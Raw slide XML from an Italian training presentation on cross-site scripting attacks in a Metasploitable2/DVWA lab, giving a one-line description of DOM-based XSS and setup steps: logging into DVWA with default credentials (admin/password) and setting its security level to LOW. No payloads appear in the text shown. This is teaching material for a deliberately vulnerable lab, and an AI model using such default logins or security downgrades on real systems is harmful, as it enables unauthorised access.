                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>)​.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 23" id="23"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1508050" y="4037118"/>
            <a:ext cx="8685095" cy="264160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599" spc="548">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>PERCENTUALE DI UTILIZZO (DATI AGGIORNATI AL 2023)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 24" id="24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1508050" y="3851440"/>
            <a:ext cx="8685095" cy="99952"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6179589" cy="71118"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 25" id="25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="6179589" cy="71118"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="71118" w="6179589">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6179589" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6179589" y="71118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="71118"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 26" id="26"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="6179589" cy="99693"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 27" id="27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1508050" y="4418252"/>
            <a:ext cx="8685095" cy="99952"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6179589" cy="71118"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 28" id="28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="6179589" cy="71118"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="71118" w="6179589">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6179589" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6179589" y="71118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="71118"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 29" id="29"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="6179589" cy="99693"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 30" id="30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1349839" y="6368152"/>
            <a:ext cx="8843305" cy="47625"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6292158" cy="33886"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 31" id="31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="6292159" cy="33886"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="33886" w="6292159">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6292159" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6292159" y="33886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="33886"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 32" id="32"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="6292158" cy="62461"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 33" id="33"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3821086" y="4735425"/>
            <a:ext cx="5989282" cy="1240155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2520"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>Esempio: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Un attaccante manipola un parametro nell'URL che viene processato da uno script JavaScript nel browser dell'utente, portando all'esecuzione di codice malevolo.</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 2" id="2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="8308384" y="1835644"/>
            <a:ext cx="8240918" cy="6615711"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2024778" cy="1625468"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 3" id="3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="2024778" cy="1625468"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="1625468" w="2024778">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2024778" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2024778" y="1625468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1625468"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 4" id="4"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="2024778" cy="1654043"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>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6" id="6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="17488106" y="9502973"/>
            <a:ext cx="402082" cy="402082"/>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9" id="9"/>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10" id="10"/>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07</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 11" id="11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="0" y="0"/>
            <a:ext cx="8777564" cy="10287000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="11703418" cy="13716000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 12" id="12"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect l="17300" t="0" r="25850" b="0"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="11703418" cy="13716000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 13" id="13"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9197741" y="4033577"/>
            <a:ext cx="6937560" cy="2249425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="8778"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7700">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="HK Modular"/>
                <a:ea typeface="HK Modular"/>
                <a:cs typeface="HK Modular"/>
                <a:sym typeface="HK Modular"/>
              </a:rPr>
              <a:t>attacchi xss</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 14" id="14"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9640317" y="6254426"/>
            <a:ext cx="6052409" cy="816610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Esempi di attacco Cross Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>in ambiente</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> Metasploitable2</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7" id="7"/>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8" id="8"/>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08</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 9" id="9"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 10" id="10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1867447" y="1835644"/>
            <a:ext cx="7139757" cy="3139257"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9519675" cy="4185675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 11" id="11"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect l="0" t="4199" r="0" b="4199"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="9519675" cy="4185675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 12" id="12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1867447" y="5312099"/>
            <a:ext cx="7139757" cy="3139257"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1754225" cy="771309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 13" id="13"/>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4" id="14"/>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5" id="15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9280796" y="1835644"/>
            <a:ext cx="7139757" cy="3139257"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1754225" cy="771309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 16" id="16"/>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7" id="17"/>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8" id="18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9280796" y="5312099"/>
            <a:ext cx="7139757" cy="3139257"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9519675" cy="4185675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 19" id="19"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:srcRect l="0" t="9560" r="0" b="9560"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="9519675" cy="4185675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 20" id="20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1476431" y="1409727"/>
            <a:ext cx="782032" cy="1903146"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="1354120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 21" id="21"/>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22" id="22"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 23" id="23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="16029537" y="6967452"/>
            <a:ext cx="782032" cy="1903146"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="1354120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 24" id="24"/>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25" id="25"/>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sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 26" id="26"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4178822" y="5977608"/>
            <a:ext cx="2788414" cy="692150"/>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Configurazione livello di difficoltà</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 27" id="27"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2464800" y="5685355"/>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02</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 28" id="28"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11592171" y="3041264"/>
            <a:ext cx="4250078" cy="1369060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Inserite l’indirizzo IP della vostra macchina Metasploitable2 ed eseguite l’accesso alla DVWA con le credenziali di default :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>admin per lo Username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>password per la Password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 29" id="29"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11592171" y="2501153"/>
            <a:ext cx="2788414" cy="339725"/>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Accesso alla DVWA </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 30" id="30"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9878149" y="2208901"/>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01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 31" id="31"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4178822" y="6720878"/>
            <a:ext cx="4250078" cy="540385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Selezionare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>&lt;&lt;DVWA Security&gt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> ed impostare il livello a LOW</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover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7" id="7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1867447" y="1835644"/>
            <a:ext cx="7139757" cy="3139257"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9519675" cy="4185675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 8" id="8"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect l="-57" t="360" r="9626" b="58496"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="9519675" cy="4185675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 9" id="9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1867447" y="5312099"/>
            <a:ext cx="7139757" cy="3139257"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1754225" cy="771309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 10" id="10"/>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1" id="11"/>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2" id="12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9280796" y="1835644"/>
            <a:ext cx="7139757" cy="3139257"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1754225" cy="771309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 13" id="13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1754225" cy="771309"/>
